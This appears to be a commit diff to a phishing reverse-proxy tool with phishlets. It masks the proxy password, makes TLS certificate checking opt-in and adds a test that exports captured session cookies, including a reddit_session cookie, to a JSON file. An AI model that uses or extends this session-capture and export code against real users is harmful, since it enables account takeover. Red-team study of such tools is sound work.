Remove full printing of proxy password, test session export to file, allow verifying TLS certificates (opt-in)

Author: JamesCullum

.gitignore

@@ -1,3 +1,4 @@
 phishlets/test-*
 /*.exe
 /tmp_cfg
+/export.json

core/banner.go

@@ -8,7 +8,7 @@ import (
 )
 
 const (
-	VERSION = "2.4.2"
+	VERSION = "2.4.3"
 )
 
 func putAsciiArt(s string) {

core/certdb.go

@@ -394,7 +394,9 @@ func (d *CertDb) registerCertificate(domains []string) (*certificate.Resource, e
 func (d *CertDb) getServerCertificate(host string, port int) *x509.Certificate {
 	log.Debug("Fetching TLS certificate from %s:%d ...", host, port)
 
-	config := tls.Config{InsecureSkipVerify: true}
+	config := tls.Config{
+		InsecureSkipVerify: (os.Getenv("VALIDATETLS") != "YES"),
+	}
 	conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", host, port), &config)
 	if err != nil {
 		log.Warning("Could not fetch TLS certificate from %s:%d: %s", host, port, err)

core/http_proxy.go

@@ -1080,6 +1080,7 @@ func (p *HttpProxy) patchUrls(pl *Phishlet, body []byte, c_type int) []byte {
 
 func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (*tls.Config, error) {
 	return func(host string, ctx *goproxy.ProxyCtx) (c *tls.Config, err error) {
+		skipVerify := (os.Getenv("VALIDATETLS") != "YES")
 		parts := strings.SplitN(host, ":", 2)
 		hostname := parts[0]
 		port := 443
@@ -1105,7 +1106,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
 			}
 			if cert != nil {
 				return &tls.Config{
-					InsecureSkipVerify: true,
+					InsecureSkipVerify: skipVerify,
 					Certificates:       []tls.Certificate{*cert},
 				}, nil
 			}
@@ -1127,7 +1128,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
 				return nil, err
 			}
 			return &tls.Config{
-				InsecureSkipVerify: true,
+				InsecureSkipVerify: skipVerify,
 				Certificates:       []tls.Certificate{*cert},
 			}, nil
 		}

core/terminal.go

@@ -257,8 +257,16 @@ func (t *Terminal) handleProxy(args []string) error {
 			proxy_enabled = "yes"
 		}
 
+		var censoredPassword string
+		for i, passChar := range t.cfg.proxyPassword {
+			appendChar := passChar
+			if i > 2 {
+				appendChar = '*'
+			}
+			censoredPassword = censoredPassword + string(appendChar)
+		}
 		keys := []string{"enabled", "type", "address", "port", "username", "password"}
-		vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, t.cfg.proxyPassword}
+		vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, censoredPassword}
 		log.Printf("\n%s\n", AsRows(keys, vals))
 		return nil
 	} else if pn == 1 {

main_test.go

@@ -136,6 +136,18 @@ func TestStart(t *testing.T) {
 	terminal.ProcessCommand("sessions 1")
 	test.assertLogContains("captured", "Session token captured")
 	test.assertLogContains(`","name":"reddit_session","httpOnly":true`, "Session cookie displayed")
+	test.Clear()
+	
+	exportPath := path+"/export.json"
+	os.RemoveAll(exportPath)
+	terminal.ProcessCommand("sessions export json "+strings.ReplaceAll(exportPath, `\`, `\\`))
+	test.assertLogContains("exported sessions to json", "Can export sessions to file")
+	time.Sleep(1 * time.Second)
+	readDump, err := ioutil.ReadFile(exportPath)
+	test.outputResult(
+		(err == nil && strings.Contains(string(readDump), `"id":"1"`)),
+		"Dumped sessions are valid",
+	)
 
 	//log.Println(buf.String())
 }